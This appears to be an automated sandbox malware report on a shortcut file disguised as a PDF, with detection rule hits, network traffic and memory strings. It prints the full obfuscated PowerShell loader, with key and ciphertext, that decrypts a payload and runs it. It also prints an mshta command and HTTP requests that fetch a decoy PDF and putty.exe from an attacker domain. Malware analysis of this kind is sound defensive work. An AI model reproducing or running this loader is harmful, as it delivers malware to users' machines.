[System.Security.Cryptography.PaddingMode]::Zeros;$gnuKIz.BlockSize = 128;$gnuKIz.KeySize = 256;$gnuKIz.Key = [System.Convert]::FromBase64String($kPWuaVGM);$hGgdN = [System.Convert]::FromBase64String($eoXTm);$RaRaLJdR = $hGgdN[0..15];$gnuKIz.IV = $RaRaLJdR;$jhyJONfqz = $gnuKIz.CreateDecryptor();$ugCNpUbNf = $jhyJONfqz.TransformFinalBlock($hGgdN, 16, $hGgdN.Length - 16);$gnuKIz.Dispose();$mNOLJITf = New-Object System.IO.MemoryStream( , $ugCNpUbNf );$pvQGtgpn = New-Object System.IO.MemoryStream;$AjWBPWyhL = New-Object System.IO.Compression.GzipStream $mNOLJITf, ([IO.Compression.CompressionMode]::Decompress);$AjWBPWyhL.CopyTo( $pvQGtgpn );$AjWBPWyhL.Close();$mNOLJITf.Close();[byte[]] $AeGlbG = $pvQGtgpn.ToArray();$qNgJt = [System.Text.Encoding]::UTF8.GetString($AeGlbG);$qNgJt | powershell -, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $eoXTm = 'AAAAAAAAAAAAAAAAAAAAAOhRfbfB0Z9oGAoMOSgiWW1szkJpy8tdpzZDtTrcpHQQScNLpta757CP3/Lp9GzqMSWF/7chhFbpK5jnKm5l5GflMVIeicKnQ3tCZoPwc82rCUKi+CN+28+YgJKXEr7fHV7bfPtkkKl/IfCV5knblgZoHjLo4alPfj3vVP9+W9dBhO1jttLCgLMu7VdweZbJhA9uHOeLEKlpTmwZhy6SBRt+2wZEQ+dEohArTgBqoSvdX1qI7jixQKp5YBiIhsJS7u1Qvr/smE9NMnRlLj8eZrE59UY+w09WbevvaCeXh61O6h2aDTpepoYId9+yEwU1DPB0GqmbzCA9QdOulsJz6fVjaGogYMrT5S7XHNY3b3K8Fds6PLI9RHngZogzd88E91dJ6Cp8l8L/0YhXqmbYzQWWtalFkji34QstydprFtIIkBj5NVpQsyMwuAirXLzRAYWUXfeXCL3bsXMbhndHMmjL5UIxljin3QbIc2iew7JoG9NPIrW1cJfuakC0Y/jFAEgey3tAySeNXUsyn3/Kdn7oJodxLIwRjwHaRO3ZSEvHxH3ar969bzsawhe34Ij3+d5OxiDnJyriW04WUQmnSpB1IiiK4H4ozAiv0sv12aPGF8M5NRhzJu5xw+dCgvgsCfFx1DUJKwQ45ufm9okusl0jpVx/O+uTL+C+FQgu6Pua4CqcOdudMNHchFijnXMID9n3adXAQrcb1tSG8Brkp0jI3sJ2d3eDgc5ERd3aZTVLrVW9YlDfWNKaNDKY0xTYJy2El0nQ1GJXLH9ZEqQjU5MWZD

Sigma detected: Gzip Archive Decode Via PowerShell

Source: Process started

Author: Hieu Tran: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $eoXTm = 'AAAAAAAAAAAAAAAAAAAAAOhRfbfB0Z9oGAoMOSgiWW1szkJpy8tdpzZDtTrcpHQQScNLpta757CP3/Lp9GzqMSWF/7chhFbpK5jnKm5l5GflMVIeicKnQ3tCZoPwc82rCUKi+CN+28+YgJKXEr7fHV7bfPtkkKl/IfCV5knblgZoHjLo4alPfj3vVP9+W9dBhO1jttLCgLMu7VdweZbJhA9uHOeLEKlpTmwZhy6SBRt+2wZEQ+dEohArTgBqoSvdX1qI7jixQKp5YBiIhsJS7u1Qvr/smE9NMnRlLj8eZrE59UY+w09WbevvaCeXh61O6h2aDTpepoYId9+yEwU1DPB0GqmbzCA9QdOulsJz6fVjaGogYMrT5S7XHNY3b3K8Fds6PLI9RHngZogzd88E91dJ6Cp8l8L/0YhXqmbYzQWWtalFkji34QstydprFtIIkBj5NVpQsyMwuAirXLzRAYWUXfeXCL3bsXMbhndHMmjL5UIxljin3QbIc2iew7JoG9NPIrW1cJfuakC0Y/jFAEgey3tAySeNXUsyn3/Kdn7oJodxLIwRjwHaRO3ZSEvHxH3ar969bzsawhe34Ij3+d5OxiDnJyriW04WUQmnSpB1IiiK4H4ozAiv0sv12aPGF8M5NRhzJu5xw+dCgvgsCfFx1DUJKwQ45ufm9okusl0jpVx/O+uTL+C+FQgu6Pua4CqcOdudMNHchFijnXMID9n3adXAQrcb1tSG8Brkp0jI3sJ2d3eDgc5ERd3aZTVLrVW9YlDfWNKaNDKY0xTYJy2El0nQ1GJXLH9ZEqQjU5MWZDkryrQ2MJMkbIoRuofhdgf1Lbm0S6cGLVrPnryhnI9zO+hc3RM1f3C+NWNNFesGiRNQ8BKhRbBeJPuKvNyofEthadpJdc7RwBzuvcVrz8PfmhSwy+CNbj+mIRYU9mFJiv9fT4YKiVpQsGiZxKUu';$kPWuaVGM = 'Y1ZpbW5aY0ZUT2xpV0ZVd2FHbGNzS0Z6b2hBSHN5ZVg=';$gnuKIz = New-Object 'System.Security.Cryptography.AesManaged';$gnuKIz.Mode = [System.Security.Cryptography.CipherMode]::ECB;$gnuKIz.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$gnuKIz.BlockSize = 128;$gnuKIz.KeySize = 256;$gnuKIz.Key = [System.Convert]::FromBase64String($kPWuaVGM);$hGgdN = [System.Convert]::FromBase64String($eoXTm);$RaRaLJdR = $hGgdN[0..15];$gnuKIz.IV = $RaRaLJdR;$jhyJONfqz = $gnuKIz.CreateDecryptor();$ugCNpUbNf = $jhyJONfqz.TransformFinalBlock($hGgdN, 16, $hGgdN.Length - 16);$gnuKIz.Dispose();$mNOLJITf = New-Object System.IO.MemoryStream( , $ugCNpUbNf );$pvQGtgpn = New-Object System.IO.MemoryStream;$AjWBPWyhL = New-Object System.IO.Compression.GzipStream $mNOLJITf, ([IO.Compression.CompressionMode]::Decompress);$AjWBPWyhL.CopyTo( $pvQGtgpn );$AjWBPWyhL.Close();$mNOLJITf.Close();[byte[]] $AeGlbG = $pvQGtgpn.ToArray();$qNgJt = [System.Text.Encoding]::UTF8.GetString($AeGlbG);$qNgJt | powershell -, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $eoXTm = 'AAAAAAAAAAAAAAAAAAAAAOhRfbfB0Z9oGAoMOSgiWW1szkJpy8tdpzZDtTrcpHQQScNLpta757CP3/Lp9GzqMSWF/7chhFbpK5jnKm5l5GflMVIeicKnQ3tCZoPwc82rCUKi+CN+28+YgJKXEr7fHV7bfPtkkKl/IfCV5knblgZoHjLo4alPfj3vVP9+W9dBhO1jttLCgLMu7VdweZbJhA9uHOeLEKlpTmwZhy6SBRt+2wZEQ+dEohArTgBqoSvdX1qI7jixQKp5YBiIhsJS7u1Qvr/smE9NMnRlLj8eZrE59UY+w09WbevvaCeXh61O6h2aDTpepoYId9+yEwU1DPB0GqmbzCA9QdOulsJz6fVjaGogYMrT5S7XHNY3b3K8Fds6PLI9RHngZogzd88E91dJ6Cp8l8L/0YhXqmbYzQWWtalFkji34QstydprFtIIkBj5NVpQsyMwuAirXLzRAYWUXfeXCL3bsXMbhndHMmjL5UIxljin3QbIc2iew7JoG9NPIrW1cJfuakC0Y/jFAEgey3tAySeNXUsyn3/Kdn7oJodxLIwRjwHaRO3ZSEvHxH3ar969bzsawhe34Ij3+d5OxiDnJyriW04WUQmnSpB1IiiK4H4ozAiv0sv12aPGF8M5NRhzJu5xw+dCgvgsCfFx1DUJKwQ45ufm9okusl0jpVx/O+uTL+C+FQgu6Pua4CqcOdudMNHchFijnXMID9n3adXAQrcb1tSG8Brkp0jI3sJ2d3eDgc5ERd3aZTVLrVW9YlDfWNKaNDKY0xTYJy2El0nQ1GJXLH9ZEqQjU5MWZD

Sigma detected: Use Short Name Path in Command Line

Source: Process started

Author: frack113, Nasreddine Bencherchali: Data: Command: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user~1\AppData\Local\Temp\x64dbg.pdf", CommandLine: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user~1\AppData\Local\Temp\x64dbg.pdf", CommandLine|base64offset|contains: , Image: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe, NewProcessName: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe, OriginalFileName: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 1836, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user~1\AppData\Local\Temp\x64dbg.pdf", ProcessId: 7100, ProcessName: Acrobat.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" .(gp -pa 'HKLM:\SOF*\Clas*\Applications\msh*e').('PSChildName')http://ukr-netdigitalhub.pro/x64dbg2, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" .(gp -pa 'HKLM:\SOF*\Clas*\Applications\msh*e').('PSChildName')http://ukr-netdigitalhub.pro/x64dbg2, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" .(gp -pa 'HKLM:\SOF*\Clas*\Applications\msh*e').('PSChildName')http://ukr-netdigitalhub.pro/x64dbg2, ProcessId: 7312, ProcessName: powershell.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 624, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 8000, ProcessName: svchost.exe

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-22T14:17:43.572825+0100	2803305	3	Unknown Traffic	192.168.2.7	49750	94.156.177.166	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://ukr-netdigitalhub.pro/x64dbg.pdf

Avira URL Cloud: Label: malware

Multi AV Scanner detection for submitted file

Source: filepdf.pdf.lnk.download.lnk

ReversingLabs: Detection: 34%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 96.6% probability

Machine Learning detection for sample

Source: filepdf.pdf.lnk.download.lnk

Joe Sandbox ML: detected

Source:	Binary string: calc.pdbGCTL source: mshta.exe, 00000007.00000003.1416103136.0000022E89A2B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000007.00000002.1448266644.0000022E89A3A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000007.00000002.1448205771.0000022E89A2D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000007.00000003.1412422783.0000022E89A64000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000007.00000003.1411931801.0000022E89A26000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000007.00000003.1411931801.0000022E89A36000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000007.00000003.1414339616.0000022E89A28000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000007.00000003.1412959268.0000022E89A36000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000007.00000003.1414216916.0000022E89A37000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000007.00000003.1419074430.0000022E89A2C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000007.00000003.1411931801.0000022E899B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000007.00000003.1418579879.0000022E89A2B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000007.00000003.1414379225.0000022E89A39000.00000004.00000020.00020000.00000000.sdmp, x64dbg2[1].7.dr
Source:	Binary string: C:\Windows\Microsoft.Net\assembly\GAC_64\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\api-ms-win-core-handle-l1-1-0.dllbf3856ad364e35\System.Management.Automation.pdb? source: powershell.exe, 0000000D.00000002.1757602646.000001B4E98D9000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: calc.pdb source: mshta.exe, 00000007.00000003.1416103136.0000022E89A2B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000007.00000002.1448266644.0000022E89A3A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000007.00000002.1448205771.0000022E89A2D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000007.00000003.1412422783.0000022E89A64000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000007.00000003.1411931801.0000022E89A26000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000007.00000003.1411931801.0000022E89A36000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000007.00000003.1414339616.0000022E89A28000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000007.00000003.1412959268.0000022E89A36000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000007.00000003.1414216916.0000022E89A37000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000007.00000003.1419074430.0000022E89A2C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000007.00000003.1418579879.0000022E89A2B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000007.00000003.1414379225.0000022E89A39000.00000004.00000020.00020000.00000000.sdmp, x64dbg2[1].7.dr
Source:	Binary string: owershell.PSReadline.pdb source: powershell.exe, 0000000D.00000002.1755831544.000001B4E95CC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: lambda_methodCore.pdb.q source: powershell.exe, 0000000D.00000002.1757602646.000001B4E98A1000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 21_2_00007FF6BB2E3F40 FindFirstFileA,FindClose,	21_2_00007FF6BB2E3F40
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 21_2_00007FF6BB2D6B00 GetProcAddress,FindFirstFileA,CloseHandle,	21_2_00007FF6BB2D6B00
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 21_2_00007FF6BB2B0520 GetWindowsDirectoryA,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,GetCurrentProcessId,	21_2_00007FF6BB2B0520
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 21_2_00007FF6BB2E2190 FindFirstFileA,FindClose,FindWindowA,	21_2_00007FF6BB2E2190

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 22 Nov 2024 13:17:43 GMTServer: Apache/2.4.59 (Debian)Last-Modified: Fri, 15 Nov 2024 20:18:58 GMTETag: "196120-626f946df1440"Accept-Ranges: bytesContent-Length: 1663264Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 64 86 0a 00 bf 1a 11 66 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 00 00 82 0e 00 00 84 0a 00 00 00 00 00 04 af 0b 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 b0 19 00 00 04 00 00 71 20 1a 00 02 00 60 81 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 10 48 12 00 b4 00 00 00 00 e0 13 00 40 ab 05 00 00 10 13 00 38 6d 00 00 00 0a 19 00 20 57 00 00 00 90 19 00 d8 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 3d 10 00 28 00 00 00 30 d6 0f 00 40 01 00 00 00 00 00 00 00 00 00 00 a8 53 12 00 e0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 56 80 0e 00 00 10 00 00 00 82 0e 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 5c 06 04 00 00 a0 0e 00 00 08 04 00 00 86 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 9c 55 00 00 00 b0 12 00 00 10 00 00 00 8e 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 38 6d 00 00 00 10 13 00 00 6e 00 00 00 9e 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 30 30 63 66 67 00 00 38 00 00 00 00 80 13 00 00 02 00 00 00 0c 13 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 67 78 66 67 00 00 00 60 2a 00 00 00 90 13 00 00 2c 00 00 00 0e 13 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 11 00 00 00 00 c0 13 00 00 02 00 00 00 3a 13 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 5f 52 44 41 54 41 00 00 5c 01 00 00 00 d0 13 00 00 02 00 00 00 3c 13 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 40 ab 05 00 00 e0 13 00 00 ac 05 00 00 3e 13 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 1e 00 00 00 90 19 00 00 20 00 00 00 ea 18 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: global traffic	HTTP traffic detected: GET /x64dbg.pdf HTTP/1.1Host: ukr-netdigitalhub.proConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /putty.exe HTTP/1.1Host: ukr-netdigitalhub.pro

Source: Network traffic

Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49750 -> 94.156.177.166:80

Source: global traffic

HTTP traffic detected: GET /x64dbg2 HTTP/1.1Accept: */*Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ukr-netdigitalhub.proConnection: Keep-Alive

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\AppData\Local\Temp\putty.exe

Code function: 21_2_00007FF6BB2C0DE0 recv,

21_2_00007FF6BB2C0DE0

Source: global traffic	HTTP traffic detected: GET /x64dbg2 HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ukr-netdigitalhub.proConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /x64dbg.pdf HTTP/1.1Host: ukr-netdigitalhub.proConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /putty.exe HTTP/1.1Host: ukr-netdigitalhub.pro

Source: global traffic	DNS traffic detected: DNS query: ukr-netdigitalhub.pro
Source: global traffic	DNS traffic detected: DNS query: x1.i.lencr.org

Source: powershell.exe, 0000000D.00000002.1683139322.000001B4E1F90000.00000004.00000800.00020000.00000000.sdmp, putty.exe.13.dr	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: powershell.exe, 0000000D.00000002.1683139322.000001B4E1F90000.00000004.00000800.00020000.00000000.sdmp, putty.exe.13.dr	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: powershell.exe, 0000000D.00000002.1683139322.000001B4E1F90000.00000004.00000800.00020000.00000000.sdmp, putty.exe.13.dr	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
Source: powershell.exe, 0000000D.00000002.1683139322.000001B4E1F90000.00000004.00000800.00020000.00000000.sdmp, putty.exe.13.dr	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: powershell.exe, 0000000D.00000002.1683139322.000001B4E1F90000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1604581139.000001B4D257B000.00000004.00000800.00020000.00000000.sdmp, putty.exe.13.dr	String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: svchost.exe, 00000009.00000002.2577782786.000001E7B9C00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.ver)
Source: powershell.exe, 0000000D.00000002.1683139322.000001B4E1F90000.00000004.00000800.00020000.00000000.sdmp, putty.exe.13.dr	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
Source: powershell.exe, 0000000D.00000002.1683139322.000001B4E1F90000.00000004.00000800.00020000.00000000.sdmp, putty.exe.13.dr	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
Source: powershell.exe, 0000000D.00000002.1683139322.000001B4E1F90000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1604581139.000001B4D257B000.00000004.00000800.00020000.00000000.sdmp, putty.exe.13.dr	String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: 77EC63BDA74BD0D0E0426DC8F80085060.16.dr	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: qmgr.db.9.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: qmgr.db.9.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.9.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: qmgr.db.9.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: qmgr.db.9.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: qmgr.db.9.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: edb.log.9.dr, qmgr.db.9.dr	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: powershell.exe, 0000000A.00000002.1889681010.00000194EC814000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1889681010.00000194EC957000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1782431399.00000194DE1E6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1683139322.000001B4E1001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000D.00000002.1683139322.000001B4E1F90000.00000004.00000800.00020000.00000000.sdmp, putty.exe.13.dr	String found in binary or memory: http://ocsp.comodoca.com0
Source: powershell.exe, 0000000D.00000002.1683139322.000001B4E1F90000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1604581139.000001B4D257B000.00000004.00000800.00020000.00000000.sdmp, putty.exe.13.dr	String found in binary or memory: http://ocsp.sectigo.com0
Source: powershell.exe, 0000000D.00000002.1604581139.000001B4D122E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 0000000D.00000002.1604581139.000001B4D149D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 0000000A.00000002.1782431399.00000194DC7A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1604581139.000001B4D0F71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000D.00000002.1604581139.000001B4D149D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 0000000D.00000002.1604581139.000001B4D2504000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ukr-netdigitalhub.p
Source: powershell.exe, 0000000D.00000002.1604581139.000001B4D2504000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ukr-netdigitalhub.pr
Source: powershell.exe, 0000000D.00000002.1604581139.000001B4D122E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1604581139.000001B4D2504000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1604581139.000001B4D2559000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ukr-netdigitalhub.pro
Source: powershell.exe, 0000000D.00000002.1604581139.000001B4D2504000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ukr-netdigitalhub.pro/
Source: powershell.exe, 0000000D.00000002.1604581139.000001B4D2504000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ukr-netdigitalhub.pro/p
Source: powershell.exe, 0000000D.00000002.1604581139.000001B4D2504000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ukr-netdigitalhub.pro/pu
Source: powershell.exe, 0000000D.00000002.1604581139.000001B4D2504000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ukr-netdigitalhub.pro/put
Source: powershell.exe, 0000000D.00000002.1604581139.000001B4D2504000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ukr-netdigitalhub.pro/putt
Source: powershell.exe, 0000000D.00000002.1604581139.000001B4D2504000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ukr-netdigitalhub.pro/putty
Source: powershell.exe, 0000000D.00000002.1604581139.000001B4D2504000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ukr-netdigitalhub.pro/putty.
Source: powershell.exe, 0000000D.00000002.1604581139.000001B4D2504000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ukr-netdigitalhub.pro/putty.e
Source: powershell.exe, 0000000D.00000002.1604581139.000001B4D2504000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ukr-netdigitalhub.pro/putty.ex
